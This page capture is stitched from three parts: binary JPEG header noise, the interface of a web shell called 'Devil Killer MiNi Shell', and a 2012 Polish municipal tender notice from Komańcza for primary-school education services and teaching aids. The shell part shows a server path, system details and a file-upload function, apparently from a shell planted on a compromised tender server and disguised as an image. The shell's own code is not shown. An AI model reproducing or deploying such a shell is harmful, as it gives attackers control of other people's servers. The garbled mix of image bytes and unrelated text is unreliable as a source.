JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121004/382134-N-2012.html

<p class="kh_header"><b>Komańcza: Świadczenie usługi edukacyjnej w projekcie o tytule : Indywidualizacja nauczania i wychowania uczniów klas I-III szkół podstawowych w gminie Komańcza</b><br>
<b>Numer ogłoszenia: 382134 - 2012; data zamieszczenia: 04.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Komańcza , Komańcza 166, 38-543 Komańcza, woj. podkarpackie, tel. 13 46 77 035, faks 13 46 77 035.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.komancza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi edukacyjnej w projekcie o tytule : Indywidualizacja nauczania i wychowania uczniów klas I-III szkół podstawowych w gminie Komańcza.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Realizacja zamówienia obejmuje :

1. Świadczenie usług rozumianych jako przeprowadzanie specjalistycznych zajęć edukacyjnych wspierających indywidualizację procesu dydaktycznego, na poziomie właściwym dla nauczania w szkołach podstawowych w klasach I - III w SP w Rzepedzi oraz SP w Komańczy w terminie  do 21 czerwca 2013r.

Szczegółowy opis przedmiotu zamówienia - wykonawca przedłoży program indywidualizacji i koncepcję prowadzenia zająć (na podstawie właściwych założeń projektowych) obejmujący tematykę następujących edukacyjnych zajęć dodatkowych:
Warunkiem zamawiającego jest, aby wykonawca dysponował przynajmniej 2 osobami do prowadzenia każdego rodzaju niżej wymienionych zajęć:

a.)	Zajęcia gimnastyki korekcyjnej:
-	Ilość godzin - 135h łącznie dla wszystkich grup,
-	Ilość grup - 3
SP w Rzepedzi 3 gr. 5-osobowe - po 45 h,
-	Termin realizacji - 135h od dnia podpisania umowy do VI 2013 r.

b.)	Zajęcia dla uczniów szczególnie uzdolnionych:
-	Ilość godzin - 270h łącznie dla wszystkich grup,
-	Ilość grup - 6
SP w Rzepedzi 4 gr. (6 i 5)-osobowe - 45 h,
SP w Komańczy 2 gr. (6 i 5)-osobowe - 45 h,
-	Termin realizacji  - 270h od dnia podpisania umowy do VI 2013 r.

c.)	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu:
-	Ilość godzin - 135h łącznie dla wszystkich grup,
-	Ilość grup - 3
SP w Komańczy 3 gr. (7 i 6)-osobowe - 45 h,
-	Termin realizacji - 135h od dnia podpisania umowy do VI 2013 r.

d).	Zajęcia dla dzieci z trudnościami w matematyce:
-	Ilość godzin - 90h łącznie dla wszystkich grup,
-	Ilość grup - 2
SP w Komańczy 2 gr. (7 i 6)-osobowe - 45 h,
-	Termin realizacji - 90h od dnia podpisania umowy do VI 2013 r.

2. Dostawę następujących pomocy dydaktycznych przewidzianych do zakupu w budżecie projektu, na rzecz prawidłowej realizacji przedmiotu zamówienia w terminie do 30 dni od daty podpisania umowy

A). Doposażenie bazy dydaktycznej SP w Rzepedzi:
dostawa pomocy dydaktycznych:
-	Dostawa laptopa (waga do 3 kg, przekątna ekranu min. 15.6, rozdzielczość ekranu min. 1366 x 768, procesor o właściwościach jak Intel I 3 lub równoważny, pamięć RAM min. 4 GB, dysk twardy 500 GB, nagrywarka DVD, złącza USB i HDMI, system operacyjny Windows 7) - 1 sztuka,
-	Pomoc dydaktyczna -Obciążniki miękkie na kończyny (para)- lub równoważna, dane techniczne: waga - 2 x 1 kg, zapinane na rzepy - 5 sztuk,
-	Pomoc dydaktyczna  -Hantle (para) lub równoważna, hantle pokryte są winylem, waga - 1 kg - 5 sztuk,
-	Pomoc dydaktyczna  -Komplet taśm elastycznych do ćwiczeń lub równoważna; komplet  zawiera 3 sztuki taśm (niebieska, czerwona, zielona) - 5 sztuk,
-	Pomoc dydaktyczna - Laska gimnastyczna lub równoważna, długość: 60 cm, średnica: 25 mm - 5 sztuk, 
-	Pomoc dydaktyczna - Hula-hop lub równoważna; średnica: 80 cm, grubość: 4 cm - 5 sztuk,
-	Pomoc dydaktyczna -Metalofon lub równoważna; metalofon 12 płytkowy w drewnianej skrzyni, c- g, trzy dodatkowe płytki: 2 fis + 1b - 1 sztuka,
-	Pomoc dydaktyczna - Gitara lub równoważna; wymiary: 4 x 15 x 31, waga: 1.75 kg - 2 sztuki,
-	Pomoc dydaktyczna - Rodziny wyrazów, grupowy zestaw Reading Rods lub równoważna; zawartość: duży zestaw klocków Reading Rods - tworzenie zdań, 4 zestawy kart aktywności -Tworzenie zdań, książka Word Building - Instruction & Activity Book (48-stron) zawierająca również ponad 100 kartoników do demontracji, 4 podstawki do kart i klocków Reading Rods - 1 komplet,
-	Pomoc dydaktyczna - Budowanie zdań, klocki Reading Rods  lub równoważna; dodatkowe klocki Reading Rods, 233 klocki - 2 sztuki,
-	Pomoc dydaktyczna -Gry edukacyjne zaproponowane przez wykonawcę - 2 sztuki.

B). Doposażenie bazy dydaktycznej SP w Komańczy:
dostawa pomocy dydaktycznych:
-	Pomoc dydaktyczna -Teleskop lustrzany lub równoważna; dane techniczne: zwierciadło śr. 114 mm, pole widzenia 500 mm, powiększenie 25-187, 5-krotne, z okularem 4 mm przy 375-krotnym, szperacz wyszukujący 5 x 24, ustawianie ostrości poprzez fokus, 2 okularu (8-20), łatwe mocowanie na statywie z przeciwwagą, naprowadzanie falowe, stabilny statyw aluminiowy. 3- krotna soczewka Barlow a - 1 sztuka,
-	Pomoc dydaktyczna - Lupa z rączką lub równoważna; lupa podświetlana (2 LED) o powiększeniu x 5, szerokość soczewki 50 mm w plastikowej obudowie - 5 sztuk,
-	Pomoc dydaktyczna - Globus fizyczny lub równoważna; średnica: 320mm 
wysokość: 48cm - 1 sztuka,
-	Pomoc dydaktyczna - Podświetalny termometr lub równoważna; podświetlenie, wymiary 120-70-60 mm - 3 sztuki,
-	Pomoc dydaktyczna - Waga elektroniczna lub równoważna; obciążenie max 2kg, działka odczytowa d=1g, czytelny wyświetlacz LCD, zasilanie bateryjne - 3 sztuki,
-	Pomoc dydaktyczna - Komplet naczyń do mierzenia objętości lub równoważna; zawartość: 5 butelek z nakrętkami (4 l, 2 l, 1 l, 500 ml, 250 ml) - 3 zlewki (1000 ml, 500 ml, 250 ml) - 5 kubków z uchwytem (1 cup = 236 ml oraz 1-2, 1-3, 1-4 i 1-8 tej miary z oznaczeniem w mililitrach) - 6 łyżeczek (15 ml, 7,5 ml, 5 ml, 2,5 ml, 1,25 ml , 0,62 ml) - wszystkie naczynia z mocnego przezroczystego tworzywa - 1 komplet,
-	Pomoc dydaktyczna -Walizka ekobadacza lub równoważna; Walizka ekobadacza zawiera: Notatnik, Płyn Helliga, Strzykawka 5 ml, Strzykawka 10 ml, Bibuły osuszające,Lupa powiększająca x 5, Probówka okrągło denna, Stojak plastikowy do probówek, Łyżeczka do poboru próbek gleby, Płytka porcelanowa kwasomierza Helliga, Trzy łyżeczki do poboru odczynników sypkich, Trzy próbówki analityczne płaskodenne z korkami, Zalaminowane skale barwne do odczytywania wyników ,15-cie plastikowych buteleczek z mianowanymi roztworami wskaźników, Siateczka do usunięcia zanieczyszczeń mechanicznych z pola poboru wody - 1 komplet,
-	Pomoc dydaktyczna - Układ słoneczny, model lub równoważna; zestaw modeli o średnicy od 20 aż do 89 cm, każdy model posiada oczko haczyk na zawieszenie, 
komplet obejmuje modele 8 planet + Pluton, Słońce, Księżyc - 1 komplet,
-	Pomoc dydaktyczna -Dyslektyk I, II lub równoważna; program multimedialny do wspierania terapii pedagogicznej - 1 kompet (dwa rodzaje),
-	Pomoc dydaktyczna - Bajki relaksacyjne lub równoważna; komplet bajek terapetycznych - 1 komplet,
-	Pomoc dydaktyczna - Loteryjki, rebusy zaproponowane przez wykonawcę - 3 sztuki,
-	Pomoc dydaktyczna - Scrable lub równoważna; zawartość: 84 płytki z literami, plansza do gry, a na niej: 1 poziom - Słowa i Obrazki, 2 poziom - Kolory i Żetony, 29 niebieskich żetonów, 16 czerwonych żetonów, 1 woreczek na płytki - 2 sztuki,
-	Pomoc dydaktyczna - Układanki sylabowe lub równoważna; zestaw zawiera: 72 dwustronne kartoniki, 144 sylaby, 48 plakietek o wym. 4,8 cm x 4,8 cm - 2 sztuki,
-	Pomoc dydaktyczna -Gry dydaktyczne zaproponowane przez wykonawcę - 2 sztuki,
-	Pomoc dydaktyczna  - Banknoty i monety, pomoce matematyczne - Gra planszowa - Poczta lub równoważna;  - 1 sztuka,
-	Pomoc dydaktyczna  - Liczmany lub równoważna; 102 drewniane klocki w 6 kolorach do sortowania i konstruowania, wym. 2 x 2 cm - 3 komplety.

(rzeczy te przeznaczone są dla dzieci ze szkół podstawowych do zajęć edukacyjnych - powinny zatem uwzględniać wiek dzieci, klasy I - III SP; powinny posiadać także odpowiednie atesty i certyfikaty zgodności z europejskimi normami oraz być w 100% bezpieczne dla dzieci - beneficjentów ostatecznych w projekcie. W związku z tym, że w budżecie projektu, w większości przypadków, są one podane z nazwy, Zamawiający na podst. art. 29 ust. 3 podaje ich nazwę własną dodając wyraz lub równoważny lub samą nazwę opisową)

Wykonawca dostarczy w/w pomoce dydaktyczne wraz z protokołem, w którym wyszczególni ich ilość oraz ceny jednostkowe 

Szczegółowy opis przedmiotu zamówienia oraz wymagania określone zostały w specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w przypadku wygenerowania przez projekt oszczędności, zgodnie z pzepisami ustawy pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 81.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagane wniesienie wadium w wysokości : 1.000,00 zł 
(słownie: jeden tysiąc złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienie mogą ubiegać się oferenci, którzy spełnią warunki określone w art. 22 ust.1 ustawy Prawo zamówień publicznych. Ocena spełnienia przez wykonawców warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana na podstawie niżej wymienionych dokumentów zgodnie z formułą: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca udokumentuje, że posiada doświadczenie w realizacji usługi tego rodzaju lub podobnej rodzajowo do przedmiotu zamówienia tj. wykaże za pośrednictwem załączonego do oferty wykazu i stosownych potwierdzeń wykonania/wykonywania usług, na doświadczenie których się powołuje, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, lub jeśli okres prowadzenia działalności jest krótszy - w tym okresie, wykonuje lub wykonywał przynajmniej jedną usługę o żądanym zakresie do spełnienia warunku posiadania wiedzy i doświadczenia, o wartości nie niższej niż 70 tysięcy złotych, z podaniem jej wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi zostały lub są wykonywane należycie
Ocena spełnienia przez wykonawców warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana na podstawie niżej wymienionych dokumentów zgodnie z formułą: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych szczegółowych wymagań do spełnienia tego warunku. Weryfikacja spełnienia warunku odbędzie sie w oparciu o oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodnie z formułą : spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca udokumentuje, że dysponuje odpowiednimi osobami zdolnymi do wykonania zamówienia (kwalifikacje nie mniejsze niż te które określił Minister Edukacji w rozporządzeniu z dnia 12 marca 2009r. w sprawie szczególnych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków w których można zatrudniać niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli w par. 2 ust. 1, par. 3 lub par. 4.1 lub par. 4.2, minimum jedną osobę do każdego rodzaju zajęć. Wykonawca obowiązany jest załączyć do oferty wykaz osób które będą odpowiedzialne za świadczenie usługi (prowadzenie zajęć), wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia oraz informacją o podstawie dysponowania tymi osobami 
Ocena spełnienia przez wykonawców warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana na podstawie niżej wymienionych dokumentów zgodnie z formułą: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualną informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, o wartości nie niższej niż 70 tysięcy złotych. Informacja musi być wystawiona nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert. 
Ocena spełnienia przez wykonawców warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana na podstawie niżej wymienionych dokumentów zgodnie z formułą: spełnia- nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty, które należy dołączyć do oferty:

1. Oświadczenie potwierdzające doświadczenie wykonawcy w zakresie świadczenia usługi edukacyjnej o kodzie CPV 80100000-5 lub 80110000-8, na rzecz podmiotu trzeciego, w okresie poprzedzającym upływ terminu składania ofert 

2. Dokumenty potwierdzający że potencjał osobowy przedstawiony przez wykonawcę w zał. nr 4 posiada kwalifikacje nie mniejsze niż te które określił Minister Edukacji w rozporządzeniu z dnia 12 marca 2009r. w sprawie szczególnych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków w których można zatrudniać niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli w par. 2 ust. 1, par. 3 lub par. 4.1 lub par. 4.2 

W/w dokumenty szczegółowo opisano w SIWZ pkt. XIV Kryteria oceny ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie - 30</li>
<li>3 - Kwalifikacje - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość przesunięcia terminów w wypadku, gdyby nastąpiły opóźnienia związane z realizacją założeń projektowych, wynikające z przyczyn leżących po stronie Zamawiającego lub Instytucji Pośredniczącej</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.komańcza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Komańczy 38-543 Komańcza 166..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.10.2012 godzina 10:00, miejsce: Urząd Gminy w Komańczy 38-543 Komańcza 166. pok.nr 9 sekreatriat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez  Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu IX. Rozwój wykształcenia i kompetencji w regionach, 
9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.</p>
